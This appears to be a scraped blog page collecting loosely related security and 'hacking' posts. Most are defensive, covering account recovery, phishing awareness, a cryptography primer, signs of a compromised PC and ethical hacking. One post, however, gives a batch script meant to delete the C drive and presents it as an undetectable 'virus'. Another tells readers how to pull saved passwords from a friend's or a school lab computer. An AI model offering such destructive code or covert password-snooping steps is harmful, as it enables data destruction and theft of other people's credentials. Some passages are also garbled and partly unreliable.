What to Do After Your Email Account Gets Hacked

What to Do After Your Email Account Gets Hacked

 learn what steps you should take if your email address gets hacked after the break.

• Change the password: The first line of defence against hackers is a solid password. Turns out, mine was pretty lame. Here are a few tips on how to pick a good one so this doesn't happen to you.
• Check your other accounts: I know that sometimes it's easy to remember just one password, but if you've used the same password on multiple accounts (say Facebook, Twitter, and heaven forbid, your bank account) then you'll want to change those as well as soon as possible.
• Delete old accounts: Although it may be fun to sign into the MySpace profile you haven't used in six months, go ahead and dump it — it's just begging to get hacked. Use a few of these handy websites that will help you find old profiles and accounts you may have forgotten about to keep your hacker liability low.
• Send an apology: Even if you haven't corresponded to the poor people you've spammed in months (or years!), sending a mass email (at the least) will help smooth things over. No one likes finding spam in their inbox, especially when it's from an old friend.
• Pay it forward: It's embarrassing enough finding out that you've been unknowingly spamming your friends and colleagues, so if you ever get spam from a friend, contact them immediately to help them minimize the damage.

How to Protect Your Twitter Account From Hackings

How to Protect Your Twitter Account From Hackings

Follow these four steps to protect your Twitter account from falling victim to hackers.

• Don't click on links from strangers — Unfortunately stranger danger is alive and well on the Internet in the form of weird direct messages or tweet replies that direct you to look at a picture of "OMG, is this your new tattoo?!" It's not. Don't click. If an actual Twitter friend sends a message that's a bit off, verify on another platform — SMS or email — if they meant to send the tweet. Chances are their account was hacked, or maybe they just needed to be gently told that they sort of tweet like a spammer.
• Avoid phishing attempts — When signing into Twitter, check that you're on a secure and official log-in page by looking for a URL beginning with "https://" which denotes a safe connection to input username and password.

Read on for password safety tips and how to interact with third-party apps.

• Create unique passwords across accounts — Having a complicated password won't help much when the same one is used across multiple sites. Once hackers get into one account, it's that much easier for them to use the same information and request a password reset of email or Facebook accounts. Use a different password for each web-based account.
• Use third-party apps with caution — In your Twitter account settings, head over to Apps to see which services were previously given permission to integrate with your Twitter account. Revoke access to any you don't use often, or those that actually ask for your password.

Learn To Make Dangerous Virus In A Minute

Learn To Make Dangerous Virus In A Minute

In this post i will teach you to make simple yet very powerfull or you can say harmfull computer virus using a batch file. No software is required to make this virus, Noteapad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.

What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to Make the virus ?

   1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

How To Hack Saved Password In Firefox ?

How To Hack Saved Password In Firefox ?

In this post i will share with you guys how to view saved password in Mozilla Firefox web browser. This trick can be helpfull if you get your hands on someone computer maybe your friends and he has saved password for certain websites like gmail, facebook,yahoo etc then you can easily view his password with very simple and easy trick that iam going to share today. 

For demonstration purpose i have already saved a fake email password for facebook. But it will work on any website. So lets get started.

How to do ?

1. Open Firefox Web browser

2. Then Click on FireFox > Option > Option as shown in below picture

3. Then a POP Up box will appear, In that go to security and click on Show Passwordsas show below.

4. Now click on website whose password you want to see ans click on show passwordas shown in below image. (Note: It will ask for confirmation so click on yes when dialog box appears)

5. Done, You have hacked password of your victim with few simple steps. You can try this at school computer lab if someone have saved their password. 

How To Open Banned Websites WIth Proxy Sites ?

How To Open Banned Websites WIth Proxy Sites ?

There are many sites which are blocked by government because of breaking laws of their country. The user downloads many softwares to open these sites but end up beinginfected by  malware, virus. Today i will share a trick with you guys which can help you easily open these banned sites without downloading anything. As you know that there are many online proxies but everyone need a proxy server which is faster and trusted. Here in this post I am revealing an online proxy and a tutorial to open banned sites with the help of these online proxies which is trusted and fast. Just follow my step to openbanned sites.

How To Open Banned Site ?

1. Open www.incloak.com in your browser.
You can also use any proxy site from list below

• List Of Good Proxy Sites

2. After that enter the URL of the site which you want to open like below.

3. Now click the Hide Me button and enjoy.

Cryptography

Cryptography

By definition cryptography is the process of converting recognizable data into an encrypted code for transmitting it over a network (either trusted or untrusted). Data is encrypted at the source, i.e. sender's end and decrypted at the destination, i.e. receiver's end.

In all cases, the initial unencrypted data is referred to as plain text. It is encrypted into cipher text, which will in turn (usually) be decrypted into usable plaintext using different encryption algorithms.

                       Plaintext =>Ciphertext=> Plaintext=>Encryption=> Decryption

The Purpose :-
* Authentication : The process of proving one's identity.
* Privacy/confidentiality : Ensuring that no one can read the message except the intended receiver.
* Integrity : Assuring the receiver that the received message has not been altered in any way from the original.
* Non-repudiation : A mechanism to prove that the sender really sent this message.

In general cryptographic algorithms are classified into three categories as follows :

1) Secret Key Cryptography (SKC) : Uses a single key for both encryption and decryption.
2) Public Key Cryptography (PKC) : Uses one key for encryption and another for decryption.
3) Hash Functions : Uses a mathematical transformation to irreversibly "encrypt" information.

Secret Key Cryptography :- 
With secret key cryptography, a single key is used for both encryption and decryption. Because a single key is used for both functions, secret key cryptography is also called symmetric encryption.

Secret key cryptography algorithms that are in use today include :

1) Data Encryption Standard (DES) : DES is a block-cipher employing a 56-bit key that operates on 64-bit blocks. DES uses a key of only 56 bits, and thus it is now susceptible to "brute force" attacks.
Triple-DES (3DES) and DESX are the two important variants that strengthen DES.

2) Advanced Encryption Standard (AES ) : The algorithm can use a variable block length and key length; the latest specification allowed any combination of keys lengths of 128, 192, or 256 bits and blocks of length 128, 192, or 256 bits.

3 ) International Data Encryption Algorithm (IDEA) : Secret-key cryptosystem written by Xuejia Lai and James Massey, in 1992 and patented by Ascom; a 64-bit SKC block cipher using a 128-bit key. Also available internationally.

4) Rivest Ciphers : Named for Ron Rivest, a series of SKC algorithms.

RC1 : Designed on paper but never implemented.
RC2 : A 64-bit block cipher using variable-sized keys designed to replace DES. It's code has not been made public although many companies have licensed RC2 for use in their products. Described in RFC 2268.
RC3 : Found to be breakable during development.
RC4 : A stream cipher using variable-sized keys; it is widely used in commercial cryptography products, although it can only be exported using keys that are 40 bits or less in length.
RC5 : A block-cipher supporting a variety of block sizes, key sizes, and number of encryption passes over the data. Described in RFC 2040.
RC6 : An improvement over RC5, RC6 was one of the AES Round 2 algorithms.

5) Blowfish : A symmetric 64-bit block cipher invented by Bruce Schneier; optimized for 32-bit processors with large data caches, it is significantly faster than DES on a Pentium/PowerPC-class machine. Key lengths can vary from 32 to 448 bits in length. Blowfish, available freely and intended as a substitute for DES or IDEA, is in use in over 80 products.

Public-Key Cryptography :- 
Generic PKC employs two keys that are mathematically related although knowledge of one key does not allow someone to easily determine the other key. One key is used to encrypt the plaintext and the other key is used to decrypt the ciphertext. No matter which key is applied first, but both the keys are required for the process to work. Because a pair of keys are required, this approach is also called asymmetric cryptography.
In PKC, one of the keys is designated the public key and may be advertised as widely as the owner wants. The other key is designated the private key and is never revealed to another party.

Public-key cryptography algorithms that are in use today for key exchange or digital signatures include :

1) RSA : One of the most popular encryption algorithm, invented in 1977 by three MIT scientists (Ronald Rivest, Adi Shamir, and Leonard Adleman)
The key-pair is derived from a very large number, n, that is the product of two prime numbers chosen according to special rules; these primes may be 100 or more digits in length each, yielding an n with roughly twice as many digits as the prime factors. The public key information includes n and a derivative of one of the factors of n; an attacker cannot determine the prime factors of n (and, therefore, the private key) from this information alone and that is what makes the RSA algorithm so secure.

Hash Functions :- Hash functions, also called message digests and one-way encryption, are algorithms that, in some sense, use no key. Instead, a fixed-length hash value is computed based upon the plaintext that makes it impossible for either the contents or length of the plaintext to be recovered. Hash algorithms are typically used to provide a digital fingerprint of a file's contents, often used to ensure that the file has not been altered by an intruder or virus. Hash functions are also commonly employed by many operating systems to encrypt passwords. Hash functions, then, provide a measure of the integrity of a file.
Hash algorithms that are in common use today include:
1) Message Digest (MD) algorithms : A series of byte-oriented algorithms that produce a 128-bit hash value from an arbitrary-length message.
MD2 : Designed for systems with limited memory, such as smart cards.
MD4 : Developed by Rivest, similar to MD2 but designed specifically for fast processing in software.
MD5 : Also developed by Rivest in 1991 after potential weaknesses were reported in MD4; this scheme is similar to MD4 but is slower because more manipulation is made to the original data.It accepts variable length message from the user and converts it into a fixed 128-bit message digest value.
One interesting and important aspect of the MD5 hash function is that it is a one way algorithm. This means you can produce the 128-bit fingerprint if the data chunk is available to you. You cannot, however, generate the entire data if only the fingerprint of the data is known.

2) Secure Hash Algorithm (SHA) : Algorithm for NIST's Secure Hash Standard (SHS). SHA-1 produces a 160-bit hash value and was originally published as FIPS 180-1 and RFC 3174. FIPS 180-2 describes five algorithms in the SHS: SHA-1 plus SHA-224, SHA-256, SHA-384, and SHA-512 which can produce hash values that are 224, 256, 384, or 512 bits in length, respectively. SHA-224, -256, -384, and -52 are also described in RFC 4634.

3) RIPEMD : A series of message digests that initially came from the RIPE (RACE Integrity Primitives Evaluation) project. RIPEMD-160 was designed by Hans Dobbertin, Antoon Bosselaers, and Bart Preneel, and optimized for 32-bit processors to replace the then-current 128-bit hash functions. Other versions include RIPEMD-256, RIPEMD-320, and RIPEMD-128.

4) HAVAL (HAsh of VAriable Length) : Designed by Y. Zheng, J. Pieprzyk and J. Seberry, a hash algorithm with many levels of security. HAVAL can create hash values that are 128, 160, 192, 224, or 256 bits in length.

5) Whirlpool : A relatively new hash function, designed by V. Rijmen and P.S.L.M. Barreto. Whirlpool operates on messages less than 2256 bits in length, and produces a message digest of 512 bits. The design of this hash function is very different than that of MD5 and SHA-1, making it immune to the same attacks as on those hashes.

6) Tiger : Designed by Ross Anderson and Eli Biham, Tiger is designed to be secure, run efficiently on 64-bit processors, and easily replace MD4, MD5, SHA and SHA-1 in other applications. Tiger/192 produces a 192-bit output and is compatible with 64-bit architectures; Tiger/128 and Tiger/160 produce the first 128 and 160 bits, respectively, to provide compatibility with the other hash functions.

Phishing Attacks

Phishing Attacks

Here we tells about PHISHING & How can we protect from it.~!

>>WHAT IS PHISHING:-

The act of sending an e-mail to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surroundering private information that will be used for identity theft. The e-mail directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is bogus and set up only to steal the user’s information.

 

>>MOBILE PHISHING:

Phishing scams are not limited to the internet. Some phishers use the telephone to make requests for information. If you get a call from your banking institution asking for personal information, hang up and call your bank directly. Your bank will have your social security number and account information on file and should only ask you to verify a few digits.

like Iphone,Apple ,iTunes n more...By SMS

EXAMPLE:-

>>Congratulations! Your mobile phone has won US$ 10 Million prize money. To claim your money, call this number XXXXXXXX,give your permanent address,pin number,account number or credit card number...

The phisher can ask like it They want your personal Information.

 Some people do the reply to phisher then after he/she can be target of Phisher... so never be reply these type of Messages or Mail.

 

In a phishing attack, the attacker creates a situation wherein people believe that they are dealing with an authorized party, like their bank or another service provider. The attacker will ask the victim for sensitive information such as credit card information.



>>Phishing attacks generally target:

    * Bank information – e.g. VISA and PayPal accounts.
    * Username and password information.
    * Social Security numbers.
    * Information which can be used to retrieve forgotten or lost credentials.

>>Follow the tips below to protect yourself against these threats:

· Your bank will never ask you to divulge account information or passwords via email. Never give out this information, especially via email.

· Don’t open emails that come from untrusted sources.

· Don’t run files that you receive via email without making sure of their origin.

· Don’t click links in emails. If they come from a known source, type them on the browser’s address bar. If they come from an untrusted source, simply ignore them, as they could take you to a web designed to download malware onto your computer.

· Keep your computer protected. Install a security solution and keep it up-to-date.


>>Protect yourself from Phishing scams that could lead to identity theft. I cannot stress this enough. Phishing scams are a hot topic lately that have grown with the popularity of online banking and social networking sites like MySpace, Facebook and Friendster.

The term Phishing comes from the analogy to "fishing". The phisher uses a bait to lure victims into giving out personal information like passwords and credit card numbers. The bait is typically and urgent plea from one of the victims friends or trusted websites, asking for information to resolve some sort of problem with their account.


>>Anti-phishing software is a must for anyone that accesses the internet. Most of the internet service providers have some safety measures included as part of their online security software. Most web browsers also have add-ons that can detect most phishing scams. Unfortunately, these measures are not enough. Some of the more clever phishers have found ways to trick the anti-phishing software so you need to be cautious of suspicious emails and messages.

How To check | Stop | Secure that Your Computer Hacked or Not

How To check | Stop | Secure that Your Computer Hacked or Not

  The Computer hackers can the cause serious damage to most of computer and may be your personal information. 

Hacking can mean the number of things but the computer hacking is a basically when someone accesses into your computer or may be its resources. Without your permission and then initially may be without your knowledge. Computers can be the hacked without leaving any evidence behind that. As the home user and you can always find out that if you have been hacked by the black hat hackers because the black hat hacker either wants keep using your personal computer resources or may be want to harm the computer. As the black hat can try to access your computer.

So as I am security Researcher it’s my duty to stop the black hat hacker from the unethical work and also inform to the people about the all activity of those person. So here is simple trick that how you can check your computer that may hacked by hackers. So let’s start follows the some step .then you can easily check your computer is hacked or not. The lots of technique to stop the black hat hacker. So for my reader I am sharing simple technique so let’s start.

Technique # 01

Look for the extra folder like right click on the hard drive and check that how much your hard drive is used. If your computer is compromised by hacker  so the will see your memory lost mean that your pc may be being used to the file sharing .so now check your folder then you will see the some folder with the large memory.

Technique # 02

Check the user. Just Go to the Control Panel and then click on the "Users." So if may be any extra users have been added so may be your computer is hacked or if the some user password changed and then it’s confirm that your computer was hacked.

Technique # 03

Find out that if your security has been off .so check this Go to the Control Panel then look to see if the firewall turned off sometime or always and your ant virus is on and may be window update off so then your computer is hacked.

Technique # 04

Finally in last try to runs your antivirus and other software like remove to spyware. If your computer is hacked so it show the lot of spyware

HOW TO STOP HACKER’S

So finally some technique that how to stop the hacker’s from this activity .

STEP # 01

Open your command prompt the type netstat –b so its simple show you that some IP address associated with the all program engaged with the internet then The list will be update every five seconds and then simple giving you the real-time look IP addresses your computer is the sending information to and then Look for the IP addresses or may be program names that you cannot identify. So take the screen shot. And save it in your computer.

STEP # 02

Then you can Type tracert like "tracert" like below its give you all the information about the IP address like name and internet service provider .

STEP # 03

So finally Shut down the computer. And then Contact the ISP company and give the IP address and and alert your all the problem.so then may take action.

How to check If A Website Is Reliable or Not

How to check If A Website Is Reliable or Not

It is a matter of interest for a common man that which websites are reliable and which should be dealt from a distance. It becomes even more sensitive when it comes to websites related to online shopping, best deals, online money making, jobs and discount offers too good to be true. No doubt one must not label a site unreliable, scam or fraudulent just by  viewing it, however there are certain ways one can, most of the times, tell whether a site is safe to encounter or it is unreliable.

Along with shopping sites there are also few sites which doesn’t give you accurate information which you want, like you searching for anything and you are redirected to another website just because of relative keywords. 

There are many sites which have fake content and fake or copied meta description or you can say Keywords to just redirect the traffic, while analyzing this issue for others as well mine I have gathered an enlist of these knowledgeable tips to be secure from these website and save money or time.

Here, I am enlisting few of the helpful tips for you to use while judging the reliability of a website.

1.    Web of Trust (WOT)

This is an easy to handle tool and comes in handy for judging the reliability of a website. Admin of the tool gathers feedback from users all over the world and keeps a good record. Users can download a WOT extension for the browser they use like Google Chrome, Firefox or Internet Explorer. The tool is highly integrated into the browser and is very quick to give information about the website as soon you get the search results.

You can easily download extension for your browser by visiting http://mywot.com and start using this.

I want to show a snapshot for better elaboration that how this extension helps you judging the reliability of a website.

      When there is Green the site is totally reliable.        

      Yellow indicated a spam or doubtful site.

      Red is a scam site, you must not rely on.

      A question mark says the site has not been rated; you can play your role here.

So this tool can be helpful and at any time you can check if some site is reliable or not and you should deal with them or not.  I must tell you one thing from my personal experience that WOT is reliable and accurate most of the time but when it comes to new sites where there have not been much votes by the users and reliability of the site is not well established the information provided by WOT  can be compromised.

2.    Site Design

This point of common sense states a reliable trustworthy site mostly will have a smooth, clean and clutter free design and a site with lots of mess and inappropriate formatting is definitely telling you to stay at a distance. Well there are many ppc sites available on the Internet but most of them are scam and 35% of the websites are just truly paying, people judge on the basis of its structure but that isn’t it all because this can be done for any blog or website. Try to check the Structure which shows the uniqueness.

3.    Admins and Authors

A site which is rooted back to a well-known organization, established admin and mentioned authors is usually reliable as compared to a site which is managed anonymously. It is possible that a site which is maintained anonymously is at the same time not a scam or spam and reliable but most of the times if a site is managed by anonymous admin and much of the information is not mentioned there is something fishy and you must stay out of the scene in such cases.

4.    Alexa Ranking

Alexa ranking is another useful criterion for judging the reliability of a website. Alexa is owned by Amazon and they rank all the websites based upon multiple factors and ranking is very important to know if a website is trustworthy. Alexa ranks the blog/website on the basis or impressions/traffic the blog/website gains with particular time, so it is the better way to check the website is reliable or not as well it indicates the site in which the current site is linked.

 There are other rankings to serve the purpose but Alexa leads the rest. They monitor everything including traffic. Principle for using Alexa ranking is; The Lesser the Better.

5.    Google Page Rank

Page Rank is another good criterion for you to check whether a site is trustable or not. This is something totally different from Alexa ranking.  It is ranking from 0 to 10, the higher the better. While don’t make such decisions on the behalf of checking the Page Rank because there are many hidden tips though which a webmaster can easily rank their Page Rank from 0 to 1 and  0 to 5 and further, so try not to check directly from Page Rank checker but also go through the more steps which discussed above.

Internet Security and Ethical Hacking

Internet Security and Ethical Hacking

Welcome to the unique confluence of hackers , crackers and security professionals

on the world wide web. This is your complete resource for internet security and ethical hacking.

-: The Ethical Hacker :-Most people thinks that hackers are computer criminals. They fail to recognise the fact that criminals and hackers are two totally different things. Media is responsible for this. Hackers in reality are actually good and extremely intelligent people who by using their knowledge in a constructive manner help organisations, companies, goverment, etc. to secure documents and secret information on the internet. 

An ethical hacker is a computer and network expert who attacks a security system on behalf of its owners, seeking vulnerabilities that a malicious hacker could exploit. To test a security system, ethical hackers use the same methods as their less principled counterparts, but report problems instead of taking advantage of them. Ethical hacking is also known aspenetration testing, intrusion testing and red teaming. An ethical hacker is sometimes called a white hat, a term that comes from old Western movies, where the "good guy" wore a white hat and the "bad guy" wore a black hat.

One of the first examples of ethical hackers at work was in the 1970s, when the United States government used groups of experts called red teams to hack its own computer systems. According to Ed Skoudis, Vice President of Security Strategy for Predictive Systems' Global Integrity consulting practice, ethical hacking has continued to grow in an otherwise lackluster IT industry, and is becoming increasingly common outside the government and technology sectors where it began. Many large companies, such as IBM, maintain employee teams of ethical hackers.

In order for hacking to be deemed ethical, the hacker must obey the below rules.

1. You have permission to probe the network and attempt to identify potential security risks. It's recommended that if you are the person performing the tests that you get written consent.
2. You respect the individual's or company's privacy and only go looking for security issues.
3. You report all security vulnerabilities you detect to the company, not leaving anything open for you or someone else to come in at a later time.
4. You let the software developer or hardware manufacturer know of any security vulnerabilities you locate in their software or hardware if not already known by the company.

The term "ethical hacker" has received criticism at times from people who say that there is no such thing as an "ethical" hacker. Hacking is hacking, no matter how you look at it and those who do the hacking are commonly referred to as computer criminals. However, the work that ethical hackers do for organizations has helped improve system security and can be said to be quite successful. Individuals interested in becoming an ethical hacker can work towards a certification to become a Certified Ethical Hacker. This certification is provided by the International Council of E-Commerce Consultants (EC-Council). The exam itself costs about $500 to take and consists of 125 multiple-choice questions in version 8 of the test (version 7 consisted of 150 multiple-choice questions).